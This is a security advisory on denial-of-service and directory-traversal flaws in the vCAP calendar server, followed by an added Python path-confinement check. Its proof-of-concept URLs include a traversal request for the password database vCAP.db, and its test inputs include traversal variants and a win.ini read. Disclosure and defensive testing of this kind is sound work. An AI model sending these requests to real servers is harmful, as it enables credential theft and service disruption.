
vCAP calendar server Multiple vulnerability

title: vCAP calendar server Multiple vulnerability

Author: securma massine <securma@morx.org>

MorX Security Research Team

http://www.morx.org

Product info: vCAP (www.pscs.co.uk) is a network calendar server for Windows. vCAP allows users to create calendars which can be viewed and modified by people on the network using a web browser.

Original Advisory/PoC : http://www.morx.org/vcap.txt

Severity: Medium/High - user can remotely attack the server

Vulnerability Description:

v1: denial of service attack with a specific request

v2: directory traversal, any file on the system can be downloaded, especially vCAP's passwords (vCAP.db)

Affected Software(s): vCAP calendar server 1.9.0 Beta and prior

Affected platform(s): Windows

Exploit/Proof of Concept:

v1- http://127.0.0.1:6100/StoresAndCalendarsLi...sion=%d%d%d%d%d

v2- http://127.0.0.1:6100/../Data/vCAP.db

Solution : ??

History:

16/08/2006  initial vendor contact

17/08/2006  sending vulnerability details

31/08/2006  vulnerability confirmed

Disclaimer:

This entire document is for educational, testing and demonstrating purposes only. The author does not have any responsibility for any malicious use of this advisory or proof of concept code.
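The advisory lists no fix for v2. The following is an added example, not code from the advisory or from vCAP, of the path-confinement check a web server needs so that a request such as `/../Data/vCAP.db` is refused before any file is opened. The install path `C:\vCAP\Web` and the names `WEB_ROOT` and `resolve_request_path` are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any platform for pure string work
from urllib.parse import unquote

# Assumed layout: the web root sits beside the Data directory named in the advisory.
WEB_ROOT = r"C:\vCAP\Web"


def resolve_request_path(url_path, web_root=WEB_ROOT):
    """Return the absolute file path for a URL path, or None if it leaves web_root."""
    # Drop the query string, then decode percent-escapes once, as a server would,
    # so that %2e%2e and %5c are checked in their decoded form.
    path = unquote(url_path.split("?", 1)[0])

    # NUL bytes and ':' (drive letters, NTFS alternate data streams) have no
    # place in a served path.
    if "\x00" in path or ":" in path:
        return None

    # Treat both separators alike and force the path to be relative to the root.
    relative = path.replace("/", "\\").lstrip("\\")

    # Collapse '.' and '..' segments, then compare whole path components,
    # case-insensitively, against the root. A prefix string compare would
    # wrongly accept a sibling such as C:\vCAP\WebBackup.
    root = ntpath.normcase(ntpath.normpath(web_root))
    candidate = ntpath.normpath(ntpath.join(web_root, relative))
    if ntpath.commonpath([root, ntpath.normcase(candidate)]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the first is the v2 request from the advisory.
    samples = [
        "/../Data/vCAP.db",
        "/%2e%2e/Data/vCAP.db",
        "/..%5cData%5cvCAP.db",
        "/C:/Windows/win.ini",
        "/calendar/../index.html",
    ]
    for request in samples:
        print(f"{request!r:32} -> {resolve_request_path(request)}")
```

The check runs on the normalized result rather than searching the raw URL for `../`, so encoded and backslash variants are handled by the same comparison.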
